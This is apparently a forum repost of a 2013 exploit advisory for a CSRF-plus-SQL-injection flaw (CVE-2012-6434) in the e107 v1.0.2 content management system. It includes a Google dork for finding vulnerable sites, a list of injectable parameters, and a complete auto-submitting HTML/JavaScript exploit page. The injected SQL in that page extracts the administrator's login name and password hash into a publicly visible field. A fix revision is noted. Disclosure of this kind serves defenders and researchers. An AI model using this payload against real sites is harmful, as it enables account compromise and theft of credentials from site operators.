Nytro Posted January 3, 2013 Report Posted January 3, 2013 [h=1]e107 v1.0.2 CSRF Resulting in SQL Injection[/h]# Exploit Title: e107 v1.0.2 Administrator CSRF Resulting in SQL Injection# Google Dork: intext:"This site is powered by e107"# Date: 01/01/13# Exploit Author: Joshua Reynolds# Vendor Homepage: http://e107.org# Software Link: http://sourceforge.net/projects/e107/files/e107/e107%20v1.0.2/e107_1.0.2_full.tar.gz/download# Version: 1.0.2# Tested on: BT5R1 - Ubuntu 10.04.2 LTS# CVE: CVE-2012-6434-----------------------------------------------------------------------------------------Description:Cross-Site Request Forgery vulnerability in the e107_admin/download.php page, which is also vulnerable to SQL injection in the POST form.The e-token or ac tokens are not used in this page, which results in the CSRF vulnerability. This in itself is not a major security vulnerability but when done in conjunction with a SQL injection attack it can result in complete information disclosure.The parameters which are vulnerable to SQL injection on this page include: download_url, download_url_extended, download_author_email, download_author_website, download_image, download_thumb, download_visible, download_class.The following is an exploit containing javascript code that submits a POST request on behalf of the administrator once the page is visited. It contains a SQL injection that would provide the username and password (in MD5) of the administrator to be added to the Author Name of a publicly available download.------------------------------------------------------------------------------------------Exploit:<html><body onload="document.formCSRF.submit();"> <form method="POST" name="formCSRF" action="http://[site]/e107/e107102/e107_admin/download.php?create"> <input type="hidden" name="cat_id" value="1"/> <input type="hidden" name="download_category" value="2"/> <input type="hidden" name="download_name" value="adminpassdownload"/> <input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/> <input type="hidden" name="download_url_external" value=""/> <input type="hidden" name="download_filesize_external" value=""/> <input type="hidden" name="download_filesize_unit" value="KB"/> <input type="hidden" name="download_author" value=""/> <input type="hidden" name="download_author_email" value=""/> <input type="hidden" name="download_author_website" value=""/> <input type="hidden" name="download_description" value=""/> <input type="hidden" name="download_image" value=""/> <input type="hidden" name="download_thumb" value=""/> <input type="hidden" name="download_datestamp" value=""/> <input type="hidden" name="download_active" value="1"/> <input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/> <input type="hidden" name="download_comment" value="1"/> <input type="hidden" name="download_visible" value="0"/> <input type="hidden" name="download_class" value="0"/> <input type="hidden" name="submit_download" value="Submit+Download"/> </form></body></html>------------------------------------------------------------------------------------------Fix:This bug has been fixed in the following revision: r13058------------------------------------------------------------------------------------------Shout outs: Red Hat Security Team, Ms. Umer, Dr. Wu, Tim Williams, friends, & family.Contact: Mail: infosec4breakfast@gmail.comBlog: infosec4breakfast.comTwitter: @jershmagershYoutube: youtube.com/user/infosec4breakfastSursa: e107 v1.0.2 CSRF Resulting in SQL Injection Quote